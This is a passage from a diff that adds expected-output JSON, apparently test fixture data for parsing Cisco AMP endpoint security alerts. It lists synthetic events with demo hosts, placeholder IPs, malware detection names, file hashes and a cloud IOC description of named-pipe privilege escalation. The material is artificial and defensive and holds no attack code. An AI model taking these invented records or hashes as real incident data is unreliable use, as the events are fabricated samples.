"host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 14116, + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 4040, + "related.hash": [ + "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "e2f5dcd966e26d54329e8d79c7201652", + "70aef829bec17195e6c8ec0e6cba0ed39f97ba48" + ], + "related.hosts": [ + "Demo_Upatre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:45:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159258594551267599", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159258594551267000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "iodnxvg.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 15757, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:37:43.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e1:e5:94:ea:a5:44" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006662", + "cisco.amp.event_type_id": 1090519084, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", + "cisco.amp.related.mac": [ + "e1:e5:94:ea:a5:44" + ], + "cisco.amp.timestamp_nanoseconds": 978000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", + "event.dataset": "cisco.amp", + "event.id": 6180341055704007000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "fileset.name": "amp", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 17081, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, + "related.hosts": [ + "Demo_Upatre" + ], + "related.ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55810, + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:32:58.000Z", + "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "27:85:29:21:67:49" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "27:85:29:21:67:49" + ], + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476910664322001000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:32:58.000Z", + "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "file.name": "cmd.exe", + "file.path": "/C:/WINDOWS/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", + "host.name": "Demo_Command_Line_Arguments_Meterpreter", + "input.type": "log", + "log.offset": 25799, + "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", + "related.hash": [ + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Meterpreter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:27:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671385032556606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 25000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671385032557000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27431, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:27:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671380737589308", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 605000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671380737589000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 30074, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671123039551547", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 81000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671123039551000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 31393, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671118744584249", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 666000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671118744584000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34036, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:25:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670861046546488", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 293000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533670861046546000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 35355, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:25:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670856751579190", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 880000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533670856751579000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 38000, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:24:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Multiple Infected Files", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1489955900329000200, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:24:58.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 39319, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:23:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648309", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533670191031648000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40618, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:22:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Executed malware", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 15212386047828, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:22:29.000Z", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "file:///C%3A/ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "input.type": "log", + "log.offset": 44582, + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:22:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 973000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669929038643000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 45938, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:21:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605487", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 333000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669671340605000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49902, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:20:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669667045638188", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669667045638000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53873, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": 